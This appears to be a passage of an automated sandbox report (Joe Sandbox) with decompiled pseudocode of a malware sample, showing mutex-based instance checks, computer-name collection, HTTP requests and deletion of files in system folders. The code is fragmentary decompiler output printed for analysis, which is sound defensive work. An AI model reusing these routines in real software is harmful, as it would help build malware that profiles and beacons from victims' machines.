				 *((intOrPtr*)(_t191 - 0x13c)) = 0x6cfa7f9a;
				 *((intOrPtr*)(_t191 - 0x138)) = 0xb2cb25cc;
				 *((intOrPtr*)(_t191 - 0x134)) = 0xb742fb49;
				 *((intOrPtr*)(_t191 - 0x130)) = 0x9e19e072;
				 *((intOrPtr*)(_t191 - 0x12c)) = 0x7435f9d3;
				 *((intOrPtr*)(_t191 - 0x128)) = 0x6151d2d;
				 *((intOrPtr*)(_t191 - 0x124)) = 0xb8c81b4e;
				 *((intOrPtr*)(_t191 - 0x120)) = 0xa0a74801;
				 *((intOrPtr*)(_t191 - 0x11c)) = 0x9254b144;
				 *((intOrPtr*)(_t191 - 0x118)) = 0xbf9a9ef;
				 *((intOrPtr*)(_t191 - 0x114)) = 0x664eea5e;
				 *((intOrPtr*)(_t191 - 0x110)) = 0xef5c68d3;
				 *((intOrPtr*)(_t191 - 0x10c)) = 0x663adb83;
				 *((intOrPtr*)(_t191 - 0x108)) = 0x698be370;
				 *((intOrPtr*)(_t191 - 0x104)) = 0xc6ab9f43;
				 *((intOrPtr*)(_t191 - 0x100)) = 0x2cb41cee;
				 *((intOrPtr*)(_t191 - 0xfc)) = 0x47d7bebb;
				 *((intOrPtr*)(_t191 - 0xf8)) = 0x33a7852f;
				 *((intOrPtr*)(_t191 - 0xf4)) = 0xa1c5614b;
				 *((intOrPtr*)(_t191 - 0xf0)) = 0xa7986281;
				 *((intOrPtr*)(_t191 - 0xec)) = 0xd5f1e78;
				 *((intOrPtr*)(_t191 - 0xe8)) = 0x394359d2;
				 *((intOrPtr*)(_t191 - 0xe4)) = 0x63aa5408;
				 *((intOrPtr*)(_t191 - 0xe0)) = 0x882305a9;
				 *((intOrPtr*)(_t191 - 0xdc)) = 0x4db9286a;
				 *((intOrPtr*)(_t191 - 0xd8)) = 0x628bddce;
				 *((intOrPtr*)(_t191 - 0xd4)) = 0x711914d8;
				 *((intOrPtr*)(_t191 - 0xd0)) = 0x69e7934f;
				 *((intOrPtr*)(_t191 - 0xcc)) = 0x38cb7c62;
				 *((intOrPtr*)(_t191 - 0xc8)) = 0xff47d5d8;
				 *((intOrPtr*)(_t191 - 0xc4)) = 0xe66607e0;
				 *((intOrPtr*)(_t191 - 0xc0)) = 0xffbe9a31;
				 *((intOrPtr*)(_t191 - 0xbc)) = 0xde0936dc;
				 *((intOrPtr*)(_t191 - 0xb8)) = 0xeeb91249;
				 *((intOrPtr*)(_t191 - 0xb4)) = 0x9a91cfec;
				 *((intOrPtr*)(_t191 - 0xb0)) = 0xd97b090f;
				 *((intOrPtr*)(_t191 - 0xac)) = 0x79e7a3b3;
				 *((intOrPtr*)(_t191 - 0xa8)) = 0xbf85e88a;
				 *((intOrPtr*)(_t191 - 0xa4)) = 0xd17b9713;
				 *((intOrPtr*)(_t191 - 0xa0)) = 0xb4a963a5;
				 *((intOrPtr*)(_t191 - 0x9c)) = 0x4e9dab1f;
				 *((intOrPtr*)(_t191 - 0x98)) = 0x26103dda;
				 *((intOrPtr*)(_t191 - 0x94)) = 0xcb4184e7;
				 *((intOrPtr*)(_t191 - 0x90)) = 0x29b9d4c3;
				 *((intOrPtr*)(_t191 - 0x8c)) = 0xb84826d1;
				 *((intOrPtr*)(_t191 - 0x88)) = 0x6691dcdb;
				 *((intOrPtr*)(_t191 - 0x84)) = 0xe77f285d;
				 *((intOrPtr*)(_t191 - 0x80)) = 0x63d37a01;
				 *((intOrPtr*)(_t191 - 0x7c)) = 0x9e07cefa;
				 *((intOrPtr*)(_t191 - 0x78)) = 0x8e456f03;
				 *((intOrPtr*)(_t191 - 0x74)) = 0xb191b1bc;
				 *((intOrPtr*)(_t191 - 0x70)) = 0xcdf1ff21;
				 *((intOrPtr*)(_t191 - 0x6c)) = 0xd53f95c1;
				 *((intOrPtr*)(_t191 - 0x68)) = 0xaed19769;
				 *((intOrPtr*)(_t191 - 0x64)) = 0x515166c1;
				 *((intOrPtr*)(_t191 - 0x60)) = 0xc4604900;
				 *((intOrPtr*)(_t191 - 0x5c)) = 0x7177c0f;
				 *((intOrPtr*)(_t191 - 0x58)) = 0xd6b03116;
				 *((intOrPtr*)(_t191 - 0x54)) = 0x48b81b3c;
				 *((intOrPtr*)(_t191 - 0x50)) = 0x7655b9b3;
				 *((intOrPtr*)(_t191 - 0x4c)) = 0x4c63c822;
				 *((intOrPtr*)(_t191 - 0x48)) = 0xdca9b450;
				 *((intOrPtr*)(_t191 - 0x44)) = 0x6562079a;
				 *((intOrPtr*)(_t191 - 0x40)) = 0xa503842e;
				 *((intOrPtr*)(_t191 - 0x3c)) = 0x97063634;
				 *((intOrPtr*)(_t191 - 0x38)) = 0xc165b32d;
				 *((intOrPtr*)(_t191 - 0x34)) = 0xbf230fad;
				 *((intOrPtr*)(_t191 - 0x30)) = 0x9b847890;
				 *((intOrPtr*)(_t191 - 0x2c)) = 0xa38ce9b0;
				 *((intOrPtr*)(_t191 - 0x28)) = 0xbae45a57;
				 *((intOrPtr*)(_t191 - 0x24)) = 0x39c26e65;
				 *((intOrPtr*)(_t191 - 0x20)) = 0x80e13151;
				 *((intOrPtr*)(_t191 - 0x1c)) = 0x4144edc3;
				 *((intOrPtr*)(_t191 - 0x18)) = 0xe2df436;
				 *((intOrPtr*)(_t191 - 0x14)) = 0x427bdf71;
				 *((intOrPtr*)(_t191 - 0x10)) = 0x8f267d87;
				 *((intOrPtr*)(_t191 - 0xc)) = 0x4d61d3e0;
				 *((intOrPtr*)(_t191 - 8)) = 0x6121230c;
				 *((intOrPtr*)(_t191 - 4)) = 0x766caa2a;
				_t189 = L00111D00(0x123930, 0x1f0, _t187);
				_t178 = LoadLibraryW(_t189); // executed
				 *0x127c80 = _t178;
				_t180 = HeapFree(GetProcessHeap(), 0, _t189);
				_t184 =  *0x127c80; // 0x772a0000
				_t190 = 0x1f5c6a;
				if(_t184 != 0) {
					goto 0x30175c;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00111480(_t182, _t184, _t191 - 0x2bc, _t187, _t190);
				} else {
					goto 0x301749;
					return _t180;
				}
			}

0x0011843a
0x00118444
0x0011844e
0x00118458
0x00118462
0x0011846c
0x00118476
0x00118480
0x0011848a
0x00118494
0x0011849e
0x001184a8
0x001184b2
0x001184bc
0x001184c6
0x001184d0
0x001184da
0x001184e4
0x001184ee
0x001184f8
0x00118502
0x0011850c
0x00118516
0x00118520
0x0011852a
0x00118534
0x0011853e
0x00118548
0x00118552
0x0011855c
0x00118566
0x00118570
0x0011857a
0x00118584
0x0011858e
0x00118598
0x001185a2
0x001185ac
0x001185b6
0x001185c0
0x001185ca
0x001185d4
0x001185de
0x001185e8
0x001185f2
0x001185fc
0x00118606
0x00118610
0x0011861a
0x00118624
0x0011862e
0x00118638
0x00118642
0x0011864c
0x00118656
0x00118660
0x0011866a
0x00118674
0x0011867e
0x00118688
0x00118692
0x0011869c
0x001186a6
0x001186b0
0x001186ba
0x001186c4
0x001186ce
0x001186d8
0x001186e2
0x001186ec
0x001186f6
0x00118700
0x0011870a
0x00118714
0x0011871e
0x00118728
0x00118732
0x0011873c
0x00118746
0x00118750
0x0011875a
0x00118764
0x0011876e
0x00118778
0x00118782
0x0011878c
0x00118796
0x001187a0
0x001187aa
0x001187b4
0x001187be
0x001187c8
0x001187d2
0x001187dc
0x001187e6
0x001187f0
0x001187fa
0x00118804
0x0011880e
0x00118818
0x00118822
0x0011882c
0x00118836
0x00118840
0x0011884a
0x00118854
0x0011885e
0x00118868
0x00118872
0x0011887c
0x00118886
0x00118890
0x0011889a
0x001188a4
0x001188ae
0x001188b8
0x001188c2
0x001188cc
0x001188d6
0x001188e0
0x001188ea
0x001188f4
0x001188fe
0x00118908
0x00118912
0x0011891c
0x00118926
0x00118930
0x0011893a
0x00118944
0x0011894e
0x00118958
0x00118962
0x0011896c
0x00118976
0x00118980
0x0011898a
0x00118994
0x0011899e
0x001189a8
0x001189b2
0x001189bc
0x001189c6
0x001189d0
0x001189d7
0x001189de
0x001189e5
0x001189ec
0x001189f3
0x001189fa
0x00118a01
0x00118a08
0x00118a0f
0x00118a16
0x00118a1d
0x00118a24
0x00118a2b
0x00118a32
0x00118a39
0x00118a40
0x00118a47
0x00118a58
0x00118a64
0x00118a6b
0x00118a72
0x00118a79
0x00118a80
0x00118a87
0x00118a8e
0x00118a95
0x00118a9c
0x00118aa3
0x00118aaa
0x00118ab1
0x00118ab8
0x00118ac7
0x00118aca
0x00118ad3
0x00118adf
0x00118ae5
0x00118aeb
0x00118aee
0x00118af6
0x00118afb
0x00118afc
0x00118afd
0x00118afe
0x00118aff
0x00118b00
0x00118b01
0x00118b02
0x00118b03
0x00118b04
0x00118b16
0x00118af0
0x00118af0
0x00118af5
0x00118af5

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00118ACA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00118AD8
HeapFree.KERNEL32(00000000), ref: 00118ADF

Strings

^Nf, xrefs: 0011885E
_2D,, xrefs: 001186EC
!, xrefs: 001184B2

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: !$^Nf$_2D,
API String ID: 872250060-2687564766
Opcode ID: d9fc51dfa3220925b427031bcdf7fa5e96f7429959777b1e2582a2bc01f94d18
Instruction ID: 1b3b82d9181d7ab93f4533c78dc129c7768088280ccf59d98859371838cd00b9
Opcode Fuzzy Hash: d9fc51dfa3220925b427031bcdf7fa5e96f7429959777b1e2582a2bc01f94d18
Instruction Fuzzy Hash: E5E1B7B4C1636DDBDB60DF829A997CDBB70BB16300F6086C9C5993A314CB710A86CF85

Uniqueness

Uniqueness Score: 100.00%

Function 0011103C, Relevance: 10.5, APIs: 7, Instructions: 49
memorysynchronizationCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E0011103C(void* __esi, void* __eflags) {
				void* _t30;
				long _t54;
				void* _t65;
				void* _t66;
				int _t73;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t85;
				void* _t87;

				 *(_t83 - 4) = 0;
				 *((intOrPtr*)(_t83 - 8)) = GetCurrentProcessId();
				_t73 = 0; // executed
				L00111BE0(E00111000, _t83 - 4); // executed
				_t4 = _t73 + 0x14; // 0x14
				_t72 = _t4;
				_t69 = 0x122000;
				_t76 = L00111D00(0x122000, _t4, 0);
				 *0x1259dc(_t83 - 0x118, 0x40, _t76,  *(_t83 - 4), 0x64da9f26);
				_t87 = _t85 + 0x14;
				HeapFree(GetProcessHeap(), 0, _t76);
				_t30 = CreateMutexW(0, 1, _t83 - 0x118); // executed
				_t65 = _t30;
				if(_t65 == 0) {
					L6:
					goto 0x300045;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("popfd");
					asm("int3");
					_t77 = L00111D00(_t69, _t72, _t73);
					 *0x1259dc(_t83 - 0x118, 0x40, _t77,  *((intOrPtr*)(_t83 - 8)));
					HeapFree(GetProcessHeap(), 0, _t77);
					_t66 = CreateMutexW(0, 1, _t83 - 0x118);
					if(_t66 != 0) {
						goto 0x300062;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("popfd");
						asm("int3");
						_t79 = L00111D00(_t69, _t72, _t73);
						 *0x1259dc(_t83 - 0x98, 0x40, _t79,  *((intOrPtr*)(_t83 - 8)));
						HeapFree(GetProcessHeap(), 0, _t79);
						_t80 = CreateEventW(0, 1, 0, _t83 - 0x98);
						if(_t80 != 0) {
							goto 0x30007f;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							GetModuleFileNameW();
							_push(_t83 - 0x18);
							_push(0x80);
							if(L00111E80(_t80) != 0) {
								WaitForSingleObject(_t80, 0xffffffff);
								CloseHandle( *(_t83 - 0x18));
								CloseHandle( *(_t83 - 0x14));
							}
							CloseHandle(_t80);
						}
						CloseHandle(_t66);
					}
				} else {
					_t54 = GetLastError();
					if(_t54 == 0xb7) {
						_t72 = _t54 + 0x1d;
						_t69 = 0x122020;
						_t81 = L00111D00(0x122020, _t54 + 0x1d, 0);
						 *0x1259dc(_t83 - 0x98, 0x40, _t81,  *(_t83 - 4));
						_t87 = _t87 + 0x14;
						HeapFree(GetProcessHeap(), 0, _t81);
						_t82 = CreateEventW(0, 1, 0, _t83 - 0x98);
						if(_t82 != 0) {
							SetEvent(_t82);
							CloseHandle(_t82);
							_t73 = 1;
						}
					}
					CloseHandle(_t65);
					if(_t73 == 0) {
						goto L6;
					}
				}
				return _t73;
			}

APIs

GetCurrentProcessId.KERNEL32 ref: 00111043
_snwprintf.NTDLL ref: 0011107F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011108A
HeapFree.KERNEL32(00000000), ref: 00111091
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 001110A1
GetLastError.KERNEL32 ref: 001110B1
CloseHandle.KERNEL32(00000000), ref: 00111125

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: HeapProcess$CloseCreateCurrentErrorFreeHandleLastMutex_snwprintf
String ID:
API String ID: 2918715589-0
Opcode ID: e9e0ff5dd89b08a79c5cb3b065e697b850a6c25023d35d43340660ba8cfd25bb
Instruction ID: 1e9021544c55c57dbbc87b8cc3e1385e511d34479d95e905b32752f17b6b9b26
Opcode Fuzzy Hash: e9e0ff5dd89b08a79c5cb3b065e697b850a6c25023d35d43340660ba8cfd25bb
Instruction Fuzzy Hash: 37012871A04205FBDB259BE0EC8DBEDB779EB84342F100065F709D2541DF315AE28B51

Uniqueness

Uniqueness Score: 3.75%

Function 0011F8B4, Relevance: 9.0, APIs: 6, Instructions: 22
fileCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E0011F8B4() {
				void* _t1;
				int _t3;
				void* _t7;
				void* _t9;
				void* _t11;

				_t1 = MapViewOfFile(); // executed
				_t7 = _t1;
				if(_t7 != 0) {
					 *0x125a0c = RtlComputeCrc32(0, _t7, GetFileSize(_t11, 0));
					UnmapViewOfFile(_t7);
				}
				CloseHandle(_t9);
				_t3 = CloseHandle(_t11);
				return _t3;
			}

0x0011f8b4
0x0011f8ba
0x0011f8be
0x0011f8d4
0x0011f8d9
0x0011f8d9
0x0011f8e0
0x0011f8e8
0x0011f8f0

APIs

MapViewOfFile.KERNEL32 ref: 0011F8B4
GetFileSize.KERNEL32(?,00000000), ref: 0011F8C3
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0011F8CD
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0011F8D9
CloseHandle.KERNEL32 ref: 0011F8E0
CloseHandle.KERNEL32 ref: 0011F8E8

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: File$CloseHandleView$ComputeCrc32SizeUnmap
String ID:
API String ID: 741204879-0
Opcode ID: f49e51765e58065f0c7ad969c16203f56355b168b026f24fde2cf91df2c66ba5
Instruction ID: db0605ed810497d7ae34edd2212c1bc29d290e7e4846e95307b78846c7adb2e4
Opcode Fuzzy Hash: f49e51765e58065f0c7ad969c16203f56355b168b026f24fde2cf91df2c66ba5
Instruction Fuzzy Hash: 7DE0B672200A04FBE7212BE5BCCCBAE7A69FB58722F004425F20181860CB7548E38F61

Uniqueness

Uniqueness Score: 0.01%

Function 0011F90A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
memoryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E0011F90A(DWORD* __eax, void* __esi) {
				int _t14;
				void* _t15;
				intOrPtr _t20;
				void* _t21;
				int _t24;
				char _t27;
				void* _t33;
				void* _t36;
				void* _t38;
				void* _t40;

				_t35 = __esi;
				 *(_t38 - 4) = 0x10;
				_t14 = GetComputerNameW(_t38 - 0x34, __eax); // executed
				if(_t14 == 0) {
					L12:
					 *(_t38 - 0x14) = 0x58;
					L13:
					goto 0x301c88;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("popfd");
					asm("int3");
					_t15 = L00111C60(_t32, 0x58, _t35);
					_t36 = _t15;
					 *0x125858("536720_3C4E0000", 0x104, _t36, _t38 - 0x14,  *0x126d58);
					return HeapFree(GetProcessHeap(), 0, _t36);
				}
				_t33 = _t38 - 0x34;
				_t20 = E00111350(_t33);
				_push(_t33);
				 *0x12610c = _t20;
				_t32 = 0x123cc0;
				_t21 = L00111C60(0x123cc0, 0x58, __esi);
				_t40 = _t40 + 4;
				_t35 = _t21;
				_t24 = WideCharToMultiByte(0, 0x400, _t38 - 0x34, 0xffffffff, _t38 - 0x14, 0x10, _t35, 0);
				HeapFree(GetProcessHeap(), 0, _t35);
				if((0 | _t24 > 0x00000000) == 0) {
					goto L12;
				}
				_t32 = _t38 - 0x14;
				if( *(_t38 - 0x14) == 0) {
					goto L13;
				} else {
					goto L3;
				}
				do {
					L3:
					_t27 =  *_t32;
					if(_t27 < 0x30 || _t27 > 0x39) {
						if(_t27 < 0x61 || _t27 > 0x7a) {
							if(_t27 < 0x41 || _t27 > 0x5a) {
								 *_t32 = 0x58;
							}
						}
					}
					_t32 = _t32 + 1;
				} while ( *_t32 != 0);
				goto L13;
			}

APIs

GetComputerNameW.KERNEL32(?), ref: 0011F916
WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 0011F95D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011F96D
HeapFree.KERNEL32(00000000), ref: 0011F974

Strings

X, xrefs: 0011F9AD

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$ByteCharComputerFreeMultiNameProcessWide
String ID: X
API String ID: 4005268116-3081909835
Opcode ID: e8693d77a3bc5bd1866db1f7a4e8afadb729f9883bd8e3e547fc7fb366ecbaf2
Instruction ID: 9b1f092ce6f5e7426963ca392c56d5b0880377a4d3d51113892de9f94a4b7453
Opcode Fuzzy Hash: e8693d77a3bc5bd1866db1f7a4e8afadb729f9883bd8e3e547fc7fb366ecbaf2
Instruction Fuzzy Hash: E6110871A4520DBAEB28EB949D45BEE77699F01308F500039F541E5091D7608ADBC726

Uniqueness

Uniqueness Score: 3.75%

Function 0011F7C2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
memoryfileCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E0011F7C2(void* __esi) {
				int _t11;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t18;

				asm("popfd");
				asm("int3");
				_t16 = L00111D00(_t12, _t13, _t14);
				 *0x1259dc(_t18 - 0x208, 0x104, _t16, "C:\Windows\system32", _t18 - 0x410);
				HeapFree(GetProcessHeap(), 0, _t16);
				_t11 = DeleteFileW(_t18 - 0x208); // executed
				return _t11;
			}

0x0011f7c2
0x0011f7c3
0x0011f7c9
0x0011f7e4
0x0011f849
0x0011f856
0x0011f860

APIs

_snwprintf.NTDLL ref: 0011F7E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011F842
HeapFree.KERNEL32(00000000), ref: 0011F849
DeleteFileW.KERNEL32(?), ref: 0011F856

Strings

C:\Windows\system32, xrefs: 0011F7D2

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$DeleteFileFreeProcess_snwprintf
String ID: C:\Windows\system32
API String ID: 3158849725-2896066436
Opcode ID: eef789d6fd5b67e82ab505ad1574aa7bc46b5641bcb60bc8e301702ef12151f6
Instruction ID: 320b7f745662da0ce5948921ffa34ab64cea9d77d015d8e0a359ef6079647254
Opcode Fuzzy Hash: eef789d6fd5b67e82ab505ad1574aa7bc46b5641bcb60bc8e301702ef12151f6
Instruction Fuzzy Hash: 86E09272801319BBCB24ABA0AC4EBEA372CEB14316F0005A2F609D6451DA7045E28B91

Uniqueness

Uniqueness Score: 16.53%

Function 00116A24, Relevance: 7.5, APIs: 6, Instructions: 45
memoryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E00116A24(void* __eax, intOrPtr* __ebx, void* __edi) {
				void* _t21;
				void _t38;
				intOrPtr _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t60;

				_t54 = __edi;
				_t42 = __ebx;
				_t21 = L00111740(_t60 - 0xb0,  *((intOrPtr*)(__eax + 4))); // executed
				if(_t21 != 0) {
					_push(_t60 - 0x10);
					if(L00112300(_t54, _t60 - 0x24, _t54) != 0) {
						_t47 =  *(_t60 - 0x10);
						_t51 = _t42 + 4;
						_t38 =  *_t47;
						 *_t51 = _t38;
						if(_t38 < 0x4000000) {
							_push(_t51);
							_t41 = L001167D0(_t47 + 4,  *((intOrPtr*)(_t60 - 0xc)) - 4, _t54); // executed
							_t47 =  *(_t60 - 0x10);
							 *_t42 = _t41;
						}
						HeapFree(GetProcessHeap(), 0, _t47);
					}
					HeapFree(GetProcessHeap(), ??, ??);
				}
				HeapFree(GetProcessHeap(), 0, _t57);
				HeapFree(GetProcessHeap(), 0,  *(_t60 - 8));
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				if( *_t42 == 0) {
					 *(_t54 + 0x1c) =  *(_t54 + 0x1c) + 1;
					return 0 |  *_t42 != 0x00000000;
				} else {
					 *((intOrPtr*)(_t54 + 0x20)) =  *((intOrPtr*)(_t54 + 0x20)) + 1;
					 *(_t54 + 0x1c) = 0;
					return 0 |  *_t42 != 0x00000000;
				}
			}

0x00116a24
0x00116a24
0x00116a2e
0x00116a38
0x00116a3f
0x00116a4d
0x00116a4f
0x00116a52
0x00116a55
0x00116a57
0x00116a5e
0x00116a60
0x00116a6a
0x00116a6f
0x00116a75
0x00116a75
0x00116a81
0x00116a81
0x00116a93
0x00116a93
0x00116aa3
0x00116ab5
0x00116ac7
0x00116ad9
0x00116ae2
0x00116afc
0x00116b0c
0x00116ae4
0x00116ae4
0x00116ae9
0x00116afb
0x00116afb

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 00116A7A
HeapFree.KERNEL32(00000000), ref: 00116A81
GetProcessHeap.KERNEL32(00000000), ref: 00116A9C
HeapFree.KERNEL32(00000000), ref: 00116AA3
GetProcessHeap.KERNEL32(00000000,?), ref: 00116AAE
HeapFree.KERNEL32(00000000), ref: 00116AB5

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: e396fe8c2e4226dff283a96cf4c7a8ae4336c1fc8bbad4d1dc05fb5c7683ad8d
Instruction ID: f59918f3d8b5f05de4fdafd97df78eba03dad77ace62c08ee713060b4e8eea3d
Opcode Fuzzy Hash: e396fe8c2e4226dff283a96cf4c7a8ae4336c1fc8bbad4d1dc05fb5c7683ad8d
Instruction Fuzzy Hash: 0701B5B0500605EFDB14EFA0DC89BFEBB7AFF14306F048464E5069B591EB72A9A0CB51

Uniqueness

Uniqueness Score: 0.01%

Function 0011179B, Relevance: 7.5, APIs: 5, Instructions: 32
networkmemoryCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E0011179B(void* __edx) {
				void* __edi;
				int _t15;
				void* _t19;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				intOrPtr _t32;
				void* _t34;

				_t26 = __edx;
				asm("popfd");
				asm("int3");
				_t31 = L00111D00(_t21, __edx, _t28);
				_t23 =  !=  ? _t31 : 0;
				_t29 = HttpOpenRequestW(_t28,  !=  ? _t31 : 0, 0, 0, 0, 0, 0x844cc300, 0);
				HeapFree(GetProcessHeap(), 0, _t31);
				if(_t29 != 0) {
					goto 0x300345;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3"); // executed
					_t15 = HttpSendRequestW(); // executed
					if(_t15 != 0) {
						if(L001115C0(_t15, _t29, _t26) == 0xc8) {
							 *((intOrPtr*)(_t34 - 4)) = L00111670(_t29,  *((intOrPtr*)(_t34 + 0x1c)));
						}
					}
					InternetCloseHandle(_t29); // executed
				}
				InternetCloseHandle( *(_t34 - 8));
				_t32 =  *((intOrPtr*)(_t34 - 4));
				InternetCloseHandle(_t19);
				HeapFree(GetProcessHeap(), ??, ??);
				return _t32;
			}

0x0011179b
0x0011179b
0x0011179c
0x001117aa
0x001117ac
0x001117c9
0x001117d2
0x001117da
0x001117dc
0x001117e1
0x001117e2
0x001117e3
0x001117e4
0x001117e5
0x001117e6
0x001117e7
0x001117e8
0x001117f0
0x00111803
0x0011180f
0x0011180f
0x00111803
0x00111813
0x00111813
0x0011181c
0x00111822
0x00111826
0x00111838
0x00111846

APIs

HttpOpenRequestW.WININET(?,00000000,00000000,00000000,00000000,00000000,844CC300,00000000), ref: 001117C0
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,844CC300,00000000), ref: 001117CB
HeapFree.KERNEL32(00000000,?,00000000), ref: 001117D2
InternetCloseHandle.WININET(00000000), ref: 0011181C
InternetCloseHandle.WININET ref: 00111826

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseHandleHeapInternet$FreeHttpOpenProcessRequest
String ID:
API String ID: 3820491364-0
Opcode ID: b2431746656624c42b38687742ac9061ef0bbcfc0ec057b5a972b6d7afafed1a
Instruction ID: 21c49d99f46b9696177b4a47200d3c5f96f9382cf79f4d4a7f60a8b51a40ba9d
Opcode Fuzzy Hash: b2431746656624c42b38687742ac9061ef0bbcfc0ec057b5a972b6d7afafed1a
Instruction Fuzzy Hash: 6EF0EC35A04300FFDB391B706D0EB2F7A689B04B42F250054F207B75D1DB74AC618755

Uniqueness

Uniqueness Score: 16.53%

Function 0011F7FE, Relevance: 7.5, APIs: 5, Instructions: 29
memoryfileCOMMON

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0011F7FE(void* __esi) {
				void* _t7;
				int _t14;
				void* _t17;
				void* _t19;
				void* _t21;

				 *0x125a94();
				_t19 = L00111D00(0x1240a0, 0xf0, _t17);
				_t7 = _t21 - 0x410;
				 *0x1259dc(_t21 - 0x208, 0x104, _t19, _t21 - 0x618, _t7, _t7, 0x67165621);
				HeapFree(GetProcessHeap(), 0, _t19);
				_t14 = DeleteFileW(_t21 - 0x208); // executed
				return _t14;
			}

0x0011f7fe
0x0011f818
0x0011f81a
0x0011f836
0x0011f849
0x0011f856
0x0011f860

APIs

SHGetFolderPathW.SHELL32 ref: 0011F7FE
_snwprintf.NTDLL ref: 0011F836
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011F842
HeapFree.KERNEL32(00000000), ref: 0011F849
DeleteFileW.KERNEL32(?), ref: 0011F856

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

